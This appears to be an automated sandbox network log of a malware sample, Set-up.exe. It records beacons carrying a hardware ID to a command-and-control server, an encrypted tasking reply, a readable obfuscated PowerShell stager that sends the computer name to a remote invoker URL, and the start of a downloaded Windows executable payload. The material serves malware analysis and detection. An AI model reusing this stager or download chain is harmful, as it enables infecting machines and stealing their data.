                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uuG3DWW6tuWuvoAWXW3KM0%2BuzlQP%2FW7bLZe7dAh%2B7eAV2NwUt%2FeROJvg1AznsdRwk99xeHB3HC13t%2BSWNiM6bgRfihbNqA2UXVrsxQjuGjl%2FThZSkzYgmlUZ%2BTRTPt0AsiPFcVo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3a8c9bf534408-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1592&rtt_var=607&sent=10&recv=27&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21536&delivery_rate=1785932&cwnd=201&unsent_bytes=0&cid=3bb182a3ea851f02&ts=945&x=0"
                                                                                                                                                2024-12-30 17:13:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                2024-12-30 17:13:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                5192.168.2.549709188.114.96.34432164C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:13:16 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=72U8ILPE5UCMOV
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 1243
                                                                                                                                                Host: laborersquei.click
                                                                                                                                                2024-12-30 17:13:16 UTC1243OUTData Raw: 2d 2d 37 32 55 38 49 4c 50 45 35 55 43 4d 4f 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 42 34 41 46 46 39 33 46 43 44 34 30 43 42 36 33 44 31 34 39 41 31 30 42 34 46 35 30 30 33 0d 0a 2d 2d 37 32 55 38 49 4c 50 45 35 55 43 4d 4f 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 32 55 38 49 4c 50 45 35 55 43 4d 4f 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 37 32 55 38 49 4c 50 45 35 55
                                                                                                                                                Data Ascii: --72U8ILPE5UCMOVContent-Disposition: form-data; name="hwid"77B4AFF93FCD40CB63D149A10B4F5003--72U8ILPE5UCMOVContent-Disposition: form-data; name="pid"1--72U8ILPE5UCMOVContent-Disposition: form-data; name="lid"hRjzG3--DNO--72U8ILPE5U
                                                                                                                                                2024-12-30 17:13:16 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:16 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=8t72rb7c7v7ghr2ogknsjjv25d; expires=Fri, 25 Apr 2025 10:59:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hDlqzaMtauvi0apKfiY%2F3tZSb9YMP7tuFZCJsyIsrxgzIFgR4BEN5zZmJ9t9oG57JONWGxoVMyV092LkssIkh2IEejk2MqrKF5dTcxPuZkIojFOkP7UCWmQrbHbrhjF9O%2FCOsQw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3a8d4bdd443c2-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2110&min_rtt=2055&rtt_var=882&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2158&delivery_rate=1168000&cwnd=162&unsent_bytes=0&cid=591a11843991390a&ts=464&x=0"
                                                                                                                                                2024-12-30 17:13:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                2024-12-30 17:13:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                6192.168.2.549712188.114.96.34432164C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:13:17 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=5MC82W35TAR
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 1057
                                                                                                                                                Host: laborersquei.click
                                                                                                                                                2024-12-30 17:13:17 UTC1057OUTData Raw: 2d 2d 35 4d 43 38 32 57 33 35 54 41 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 42 34 41 46 46 39 33 46 43 44 34 30 43 42 36 33 44 31 34 39 41 31 30 42 34 46 35 30 30 33 0d 0a 2d 2d 35 4d 43 38 32 57 33 35 54 41 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 4d 43 38 32 57 33 35 54 41 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 35 4d 43 38 32 57 33 35 54 41 52 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                Data Ascii: --5MC82W35TARContent-Disposition: form-data; name="hwid"77B4AFF93FCD40CB63D149A10B4F5003--5MC82W35TARContent-Disposition: form-data; name="pid"1--5MC82W35TARContent-Disposition: form-data; name="lid"hRjzG3--DNO--5MC82W35TARConten
                                                                                                                                                2024-12-30 17:13:17 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:17 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=q2977td4ido64ni13gcou6fber; expires=Fri, 25 Apr 2025 10:59:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bXBktrroh397aLwKJWe%2FnxAiX5tatWCg3tNIcIUYfelujffvMb1rjHTqZYn3nmDb5ADZS7bz3Yi89ENF86HO4VzkcmfDjS%2F07dl1SoewoxdcMRzk%2BOqvxTRbYqzFyGNlkr%2BQ6mI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3a8db7a717c93-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1974&min_rtt=1968&rtt_var=750&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1969&delivery_rate=1448412&cwnd=210&unsent_bytes=0&cid=c092020a02cc02c4&ts=535&x=0"
                                                                                                                                                2024-12-30 17:13:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                2024-12-30 17:13:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                7192.168.2.549715188.114.96.34432164C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:13:18 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 112
                                                                                                                                                Host: laborersquei.click
                                                                                                                                                2024-12-30 17:13:18 UTC112OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 44 4e 4f 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 37 37 42 34 41 46 46 39 33 46 43 44 34 30 43 42 36 33 44 31 34 39 41 31 30 42 34 46 35 30 30 33
                                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--DNO&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=77B4AFF93FCD40CB63D149A10B4F5003
                                                                                                                                                2024-12-30 17:13:18 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:18 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=n7eb0eodiq0v1lk9stjbru6ok5; expires=Fri, 25 Apr 2025 10:59:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=etK2H6a%2B3bFGM8zu3x4BATuHBUETerfU8FIu5pLvb4Sve9ioUKvyIX4e1WJjqroJOC5B033fWOA%2Fjq4ObBXQiJ7oEJmOJPU9dqli6w141eO1%2BhNx74td8ow94ABjVzinXXU31Rs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3a8e1fb8b7ce7-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1908&min_rtt=1897&rtt_var=734&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1015&delivery_rate=1469552&cwnd=199&unsent_bytes=0&cid=77e271675685f5ec&ts=458&x=0"
                                                                                                                                                2024-12-30 17:13:18 UTC218INData Raw: 64 34 0d 0a 54 45 30 77 48 71 37 67 74 48 39 61 59 59 4f 50 67 79 4e 62 43 66 70 37 4e 4e 4d 77 52 6e 50 61 63 64 54 77 71 4f 2f 38 41 47 67 58 4e 68 4a 72 6a 4e 71 57 46 79 34 56 38 2f 79 35 66 33 52 56 31 52 68 52 74 45 56 6f 41 4c 49 65 70 4b 79 48 31 38 6b 33 58 48 35 37 41 69 71 61 31 75 68 51 4b 67 6d 74 2b 2f 74 58 65 53 58 59 48 55 44 78 43 6e 52 66 2b 42 54 32 79 70 6d 53 30 48 74 4b 4f 57 38 4b 50 4d 61 55 77 41 38 70 57 39 2b 67 33 77 77 77 5a 5a 4d 4c 51 71 5a 64 4c 77 43 76 47 50 71 44 77 49 43 4d 58 45 63 6c 49 30 52 42 7a 59 7a 45 49 43 6b 4a 34 71 48 33 57 79 38 72 31 6c 6c 53 70 78 4a 38 51 2f 5a 54 73 64 4b 53 33 34 46 64 0d 0a
                                                                                                                                                Data Ascii: d4TE0wHq7gtH9aYYOPgyNbCfp7NNMwRnPacdTwqO/8AGgXNhJrjNqWFy4V8/y5f3RV1RhRtEVoALIepKyH18k3XH57Aiqa1uhQKgmt+/tXeSXYHUDxCnRf+BT2ypmS0HtKOW8KPMaUwA8pW9+g3wwwZZMLQqZdLwCvGPqDwICMXEclI0RBzYzEICkJ4qH3Wy8r1llSpxJ8Q/ZTsdKS34Fd
                                                                                                                                                2024-12-30 17:13:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                8192.168.2.549718185.161.251.214432164C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:13:19 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Host: cegu.shop
                                                                                                                                                2024-12-30 17:13:19 UTC249INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.26.2
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:19 GMT
                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                Content-Length: 329
                                                                                                                                                Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                Connection: close
                                                                                                                                                ETag: "676c9e2a-149"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                2024-12-30 17:13:19 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                                                Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                9192.168.2.549720104.21.37.1284432164C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:13:20 UTC206OUTGET /int_clp_sha.txt HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Host: klipvumisui.shop
                                                                                                                                                2024-12-30 17:13:21 UTC904INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:21 GMT
                                                                                                                                                Content-Type: text/plain
                                                                                                                                                Content-Length: 8767044
                                                                                                                                                Connection: close
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                ETag: "51f99eddd33cc04fb0f55f873b76d907"
                                                                                                                                                Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5zlGwXrL4fkONudPOO%2FNYsBUrQrr4Yko%2FNqZ%2F0Dnv0WdAkqtoE16BRtGzy%2Fe8TIuG042avIEZz8IKS%2FA189h3geEVmt7AAMtUpQKPsjUhqjTqr96N3EfFi8BuDyjb6ZyRlSk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3a8f16b0a32d3-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1801&rtt_var=900&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4272&recv_bytes=820&delivery_rate=117965&cwnd=146&unsent_bytes=0&cid=7d5f8a8016836336&ts=468&x=0"
                                                                                                                                                2024-12-30 17:13:21 UTC465INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                2024-12-30 17:13:21 UTC1369INData Raw: 00 00 00 00 00 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b 00
                                                                                                                                                Data Ascii: R\`.textVX `.itextdp\ `.data88:x@.bssXr.idataP@.didata`
                                                                                                                                                2024-12-30 17:13:21 UTC1369INData Raw: 40 00 01 07 48 52 45 53 55 4c 54 04 00 00 00 80 ff ff ff 7f 02 00 44 13 40 00 0e 05 54 47 55 49 44 10 00 00 00 00 00 00 00 00 04 00 00 00 e4 10 40 00 00 00 00 00 02 02 44 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 06 00 0b 40 76 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 28 9c 4a 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 28 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02 00 00 00
                                                                                                                                                Data Ascii: @HRESULTD@TGUID@D1@D2@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right(JEmpty@@(JCreate@@
                                                                                                                                                2024-12-30 17:13:21 UTC1369INData Raw: 00 4a 00 fe ff 72 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 7d 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 7d 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 7d 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 94 7e 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 43
                                                                                                                                                Data Ascii: Jr@MTObject&}@Create@Self$}@Free@Self)(JDisposeOf@Self>}@InitInstance@Self@Instance/~@CleanupInstance@Self)(JC
                                                                                                                                                2024-12-30 17:13:21 UTC1369INData Raw: 40 00 01 00 01 01 02 00 02 00 5b 00 e8 80 40 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 13 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 08 9c 1f 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 00 11 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00 08 81 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 0c 81 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 10 81 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02
                                                                                                                                                Data Ascii: @[@SafeCallException(@@Self@ExceptObject@ExceptAddr1@AfterConstruction@Self1@BeforeDestruction@Self9@Dispatch@SelfMessage
                                                                                                                                                2024-12-30 17:13:21 UTC1369INData Raw: 02 00 02 9c 10 40 00 02 00 05 41 46 6c 61 67 02 00 02 b8 12 40 00 08 00 05 41 44 61 74 61 02 00 02 00 00 5c 23 40 00 07 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 b8 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 8c 23 40 00 14 08 50 4d 6f 6e 69 74 6f 72 8c 24 40 00 02 00 a0 23 40 00 14 17 54 4d 6f 6e 69 74 6f 72 2e 50 57 61 69 74 69 6e 67 54 68 72 65 61 64 c0 23 40 00 02 00 00 c4 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 9c 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 2c 24 40 00 0e 12 54 4d 6f 6e 69 74
                                                                                                                                                Data Ascii: @AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@TMonit
                                                                                                                                                2024-12-30 17:13:21 UTC1369INData Raw: 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41 c9 00 00 cc 6d
                                                                                                                                                Data Ascii: rConstruction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$Am
